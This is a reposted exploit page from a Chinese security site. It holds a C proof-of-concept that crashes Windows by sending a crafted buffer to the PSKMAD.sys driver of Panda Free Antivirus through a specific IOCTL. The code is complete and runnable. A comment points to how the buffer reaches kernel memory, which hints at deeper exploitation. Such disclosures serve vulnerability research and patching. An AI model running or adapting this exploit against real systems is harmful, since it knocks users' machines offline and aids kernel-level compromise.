首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Panda Free Antivirus - 'PSKMAD.sys' Denial of Service
来源:http://www.saptech-erp.com.au 作者:Baris 发布时间:2017-05-05  
/*
# Exploit Title: Panda Cloud Antivirus Free - 'PSKMAD.sys' - BSoD - denial of service
# Date: 2017-04-29
# Exploit Author: Peter baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://download.cnet.com/Panda-Cloud-Antivirus-Free-Edition/3000-2239_4-10914099.html?part=dl-&subj=dl&tag=button&lang=en
# Version: 18.0
# Tested on: Windows 7 SP1 Pro x64, Windows 10 Pro x64
# CVE : requested
*/
 
#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>
 
 
#define DEVICE_NAME L"\\\\.\\PSMEMDriver"
 
LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
HANDLE GetDeviceHandle(LPCTSTR FileName) {
    HANDLE hFile = NULL;
 
    hFile = CreateFile(FileName,
        GENERIC_READ | GENERIC_WRITE,
        0,
        0,
        OPEN_EXISTING,
        NULL,
        0);
 
    return hFile;
}
 
int main()
{
 
    HANDLE hFile = NULL;
    PVOID64 lpInBuffer = NULL;
    ULONG64 lpBytesReturned;
    PVOID64 BuffAddress = NULL;
    SIZE_T BufferSize = 0x800;
    
    printf("Trying the get the handle for the PSMEMDriver device.\r\n");
    
    hFile = GetDeviceHandle(FileName);
 
    if (hFile == INVALID_HANDLE_VALUE) {
        printf("Can't get the device handle, no BSoD today. 0x%X\r\n", GetLastError());
        return 1;
    }
 
    // Allocate memory for our buffer
    lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    
 
    if (lpInBuffer == NULL) {
        printf("VirtualAlloc() failed. \r\n");
        return 1;
    }
    
 
    BuffAddress = (PVOID64)(((ULONG64)lpInBuffer));
    *(PULONG64)BuffAddress = (ULONG64)0x542DF91B; //Pool header tag???
    BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x4));
    *(PULONG64)BuffAddress = (ULONG64)0x42424242;
    BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x8));
    
    RtlFillMemory(BuffAddress, BufferSize-0x8 , 0x41);
 
 
 
        DeviceIoControl(hFile,
            0xb3702c38,
            lpInBuffer,
            NULL,  //Change it to BufferSize and put a bp PSKMAD+3150 -> rax will point to our buffer in the kernel memory
            NULL,
            NULL,
            &lpBytesReturned,
            NULL);
 
    /*This part is pretty much useless, just wanted to be nice in case the machine survives.*/
    printf("Cleaning up.\r\n");
    VirtualFree((LPVOID)lpInBuffer, sizeof(lpInBuffer), MEM_RELEASE);
    CloseHandle(hFile);
    printf("Resources freed up.\r\n");
    return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Internet Explorer 11
·IrfanView 4.44 - Denial of Ser
·Simple File Uploader - Arbitra
·Alerton Webtalk 2.5 / 3.3 - Mu
·TYPO3 News Module - SQL Inject
·MySQL < 5.6.35 / < 5.7.17 - In
·Mercurial Custom hg-ssh Wrappe
·Ghostscript 9.21 - Type Confus
·Oracle VirtualBox Guest Additi
·Microsoft Internet Explorer 11
·Apple Safari - Array concat Me
·Serviio PRO 1.8 DLNA Media Str
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved